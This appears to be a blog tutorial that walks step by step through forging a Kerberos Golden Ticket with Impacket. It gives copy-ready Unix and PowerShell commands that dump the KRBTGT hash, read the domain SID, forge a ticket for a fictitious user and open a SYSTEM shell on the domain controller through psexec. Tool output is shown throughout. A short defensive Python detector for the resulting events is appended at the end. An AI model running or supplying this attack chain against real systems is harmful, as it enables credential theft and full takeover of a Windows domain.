I wanted to know how to create a Golden Ticket, and in my pursuit to find an answer I came across many ways to do this. I found most techniques used several tools and took more work than I'd prefer. After all, I am a developer for a reason: I'm lazy! Here I will attempt to show how I do it the easy way using Impacket.

Prerequisites

  • Impacket
  • Windows Active Directory Domain Controller

This attack takes advantage of some of the features in Active Directory. That being said, an Active Directory Domain Controller is needed for this to work.

Impacket

Creating a Golden Ticket is made simple with the help of Impacket. Impacket is a suite of tools that any hacker should familiarize herself/himself with. The easiest way to get started with Impacket is to create a Docker image. For more information on that, check out my blog post impacket and docker.

For creating a Golden Ticket we are only concerned with the following tools.

  • secretsdump.py
  • lookupsid.py
  • ticketer.py
  • psexec.py

Create a Golden Ticket

To create a Golden Ticket, the NT hash of the KRBTGT account needs to be acquired, as well as the domain SID. All of this can easily be done with Impacket.

Set Environment Variables

To save time and confusion, set a few environment variables. We are going to use these throughout this tutorial. Below is an example; change the values to your needs. To set an environment variable on Unix use export, and on Windows use $env:.

TARGET_IP="192.168.64.150"

USER="Administrator"

PASSWD="Password123" (the password for USER)

DOMAIN="devserver.local"

Unix

An example for a Unix machine would be the following.

export TARGET_IP="192.168.64.150"

Windows

An example for a Windows machine would be the following.

$env:TARGET_IP="192.168.64.150"

Check environment variables.

Get-ChildItem Env:

KRBTGT NT Hash

Let's start off by getting the KRBTGT hash and setting it as an environment variable. The secretsdump.py line for krbtgt has the form user:RID:LM-hash:NT-hash:::, so the fourth colon-separated field is the NT hash.

Unix

export NTHASH=$(secretsdump.py $USER:$PASSWD@$TARGET_IP | grep krbtgt | grep ::: | cut -d":" -f4)

Windows

$env:NTHASH=python .\secretsdump.py ${env:USER}:${env:PASSWD}@${env:TARGET_IP} | Select-String -Pattern "krbtgt:" | Select-String -Pattern ":::" | Out-String | %{$_.split(":")[3]}

Domain SID

To get the domain SID use lookupsid.py and filter out just the information needed, setting it as an environment variable.

Unix

export DOMAIN_SID=$(lookupsid.py $USER:$PASSWD@$TARGET_IP | grep "Domain SID" | cut -d" " -f5)

Windows

$env:DOMAIN_SID=python .\lookupsid.py ${env:USER}:${env:PASSWD}@${env:TARGET_IP} | Select-String -Pattern "Domain SID" | Out-String | %{$_.split(":")[1].Trim()}

Create Ticket

With all the necessary data collected, create the ticket.

Unix

ticketer.py -nthash $NTHASH -domain-sid $DOMAIN_SID -domain $DOMAIN hacker

Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for devserver.local/hacker
[*]         PAC_LOGON_INFO
[*]         PAC_CLIENT_INFO_TYPE
[*]         EncTicketPart
[*]         EncAsRepPart
[*] Signing/Encrypting final ticket
[*]         PAC_SERVER_CHECKSUM
[*]         PAC_PRIVSVR_CHECKSUM
[*]         EncTicketPart
[*]         EncASRepPart
[*] Saving ticket in hacker.ccache

Windows

PS C:\impacket\examples> python .\ticketer.py -nthash ${env:NTHASH} -domain-sid ${env:DOMAIN_SID} -domain ${env:DOMAIN} hacker

Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for devserver.local/hacker
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in hacker.ccache

Set Ticket Environment Variable

To use the ticket with psexec.py, the path to the ticket needs to be set in the KRB5CCNAME environment variable.

Unix

export KRB5CCNAME=/vagrant/docs/hacker.ccache

Windows

$env:KRB5CCNAME="C:\impacket\examples\hacker.ccache"

Use the Ticket With Psexec

Below we use the ticket to authenticate as hacker against devserver, the name of the target machine.

Unix

psexec.py -dc-ip $TARGET_IP -target-ip $TARGET_IP -no-pass -k $DOMAIN/hacker@devserver.$DOMAIN

Windows

PS C:\impacket\examples> python .\psexec.py -dc-ip ${env:TARGET_IP} -target-ip ${env:TARGET_IP} -no-pass -k ${env:DOMAIN}/hacker@devserver.${env:DOMAIN}
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 192.168.64.150.....
[*] Found writable share ADMIN$
[*] Uploading file IDpUjSuF.exe
[*] Opening SVCManager on 192.168.64.150.....
[*] Creating service Qauy on 192.168.64.150.....
[*] Starting service Qauy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
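As an added example from the defender's side (not part of the original post or of Impacket), here is a small Python scanner over constructed Windows event records that looks for two artifacts this walkthrough produces: Kerberos service-ticket requests (event 4769) for a principal the directory does not know, or with an RC4 ticket type, which is what ticketer.py -nthash builds, and the service install (event 7045) that psexec.py leaves behind. The event field names, the account list and the sample records are assumptions; the naming patterns are taken from the tutorial's own output above.

```python
import re

# Constructed sample events (not captured from a real host). Field names are
# assumptions modelled on Security event 4769 and System event 7045.
SAMPLE_EVENTS = [
    {"id": 4769, "account": "alice@DEVSERVER.LOCAL", "etype": "0x12"},
    {"id": 4769, "account": "hacker@DEVSERVER.LOCAL", "etype": "0x17"},
    {"id": 7045, "service_name": "Qauy", "image_path": "%SystemRoot%\\IDpUjSuF.exe"},
    {"id": 7045, "service_name": "Sysmon64", "image_path": "C:\\Windows\\Sysmon64.exe"},
]
# Accounts that exist in the directory (constructed; in practice export the
# real list from AD, since a forged TGT can carry any principal name).
KNOWN_ACCOUNTS = {"alice", "bob", "administrator", "krbtgt"}
# ticketer.py -nthash yields an RC4-HMAC (etype 0x17) ticket; where AES
# (0x11/0x12) is the domain norm, RC4 ticket types are a downgrade indicator.
LEGACY_ETYPES = {"0x17", "0x18"}
# psexec.py uses 4 random letters for the service and 8 for the binary, as the
# tutorial's own output shows ("service Qauy", "file IDpUjSuF.exe").
SERVICE_NAME_RE = re.compile(r"^[A-Za-z]{4}$")
BINARY_NAME_RE = re.compile(r"[\\/][A-Za-z]{8}\.exe$")

def check_kerberos_event(ev):
    """Reasons a 4769 record looks like a forged TGT in use (empty if clean)."""
    reasons = []
    user = ev["account"].split("@")[0].lower()
    if user not in KNOWN_ACCOUNTS:
        reasons.append(f"unknown account {user!r}")
    if ev.get("etype") in LEGACY_ETYPES:
        reasons.append(f"legacy ticket etype {ev['etype']}")
    return reasons

def check_service_install_event(ev):
    """Reasons a 7045 record matches psexec.py's default naming (empty if clean)."""
    if SERVICE_NAME_RE.match(ev["service_name"]) and BINARY_NAME_RE.search(ev["image_path"]):
        return [f"service {ev['service_name']!r} installed from {ev['image_path']!r}"]
    return []

def scan(events):
    """Map the index of each suspicious event to its list of reasons."""
    checks = {4769: check_kerberos_event, 7045: check_service_install_event}
    findings = {}
    for i, ev in enumerate(events):
        reasons = checks.get(ev["id"], lambda _: [])(ev)
        if reasons:
            findings[i] = reasons
    return findings

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(SAMPLE_EVENTS[i]["id"], "; ".join(reasons))
```

Both checks are heuristics: legitimate 4-letter service names exist and an RC4 ticket alone is not proof, so treat a hit as a trigger for looking at the surrounding 4768/4624 events and the source host.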